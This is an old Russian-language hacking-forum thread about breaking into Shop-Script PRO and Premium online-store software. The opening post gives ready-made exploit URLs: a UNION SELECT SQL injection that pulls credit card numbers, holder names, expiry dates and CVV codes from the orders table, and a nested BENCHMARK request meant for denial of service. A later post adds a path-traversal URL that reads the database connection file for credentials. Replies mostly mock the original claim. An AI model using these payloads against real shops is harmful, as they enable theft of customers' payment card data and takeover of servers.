ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

ShopScript доступ в админ панель
  #1  
Старый 05.11.2006, 13:04
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167

Репутация: 1186
Отправить сообщение для »Atom1c« с помощью ICQ
По умолчанию ShopScript доступ в админ панель

Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
http://адрес/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
То вы сможете попасть в админкуЕсли Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
Также возможно проведение DDos атаки путём
http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BE NCHMARK(10000000,BENCHMARK(10000000,md5(current_da te)))

Вот пример сайта
http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
Только тут включён SafeMod

Последний раз редактировалось Osap1ent*; 05.11.2006 в 13:09..
 

  #2  
Старый 05.11.2006, 13:17
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310

Репутация: 488
По умолчанию

Похоже, что не ты нашел уязвимости..
 

  #3  
Старый 05.11.2006, 13:28
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167

Репутация: 1186
Отправить сообщение для »Atom1c« с помощью ICQ
По умолчанию

Я тока насчёт DDos нашёл, а про админку я где-то в сети прочитал.Может кончно DDos уже раньше нашли)
 

  #4  
Старый 05.11.2006, 14:13
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Может я туплю, но доступ в админку есть и так - http://www.shop-script-demo.com/pro/admin.php
Как я понял это как бы демонстрация этого самого скрипта...показывается как выглядит там админка...и все...
Поправьте, если ошибаюсь...
 

  #5  
Старый 05.11.2006, 14:15
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167

Репутация: 1186
Отправить сообщение для »Atom1c« с помощью ICQ
По умолчанию

Хм...Да, наверно.А то чёто я смотрю больше на другие сайты так не входит
 

  #6  
Старый 05.11.2006, 14:17
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Вот и я про тоже )
А жаль...искренне жаль )
Тему предлагаю закрыть...
 

  #7  
Старый 05.11.2006, 14:19
S7iL3t
Познающий
Регистрация: 01.08.2006
Сообщений: 65
Провел на форуме:
229853

Репутация: 89
Отправить сообщение для S7iL3t с помощью ICQ Отправить сообщение для S7iL3t с помощью Yahoo
По умолчанию

/me пацталом %)))
 

  #8  
Старый 05.11.2006, 15:36
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

жжёте парни...
 

  #9  
Старый 05.11.2006, 17:23
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

баянчег http://www.cyberlords.net/advisories/cl_shop.txt
 

  #10  
Старый 25.11.2006, 02:07
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167

Репутация: 1186
Отправить сообщение для »Atom1c« с помощью ICQ
По умолчанию

Короче, единственное что я смог найти, так это данные для подключения к БД, если очень повезёт они могут подойти и к админке.
Надо только дописать
/index.php?aux_page=../cfg/connect.inc.php
Если вы перейдёте на это страничку но ничего не будет написано( если будет написано "документ не найден на сервере" то ничего не плучится) если ничего не будет, будет просто пусто на том месте где должны быть ньюски, то просто посмотрите сорцы, там будет часть кода типа
db_username=""
bd_password=""
и т.д.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
доступ через админ панель!! guno PHP, PERL, MySQL, JavaScript 6 11.10.2006 17:45
А нафига публиковать инфу о том как ломать чаты. Егорыч+++ Чаты 52 14.11.2005 20:23
Если уже имеется доступ в админ панель форума PhpBB, как узнать реал пасс админа? silveran Форумы 3 06.05.2005 18:54
Получил доступ к админ панели на форуме phpBB, пароль админа не известен. Вопрос.. webster Форумы 12 28.04.2005 05:57
Доступ к интернету bjong Болталка 10 23.12.2004 16:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ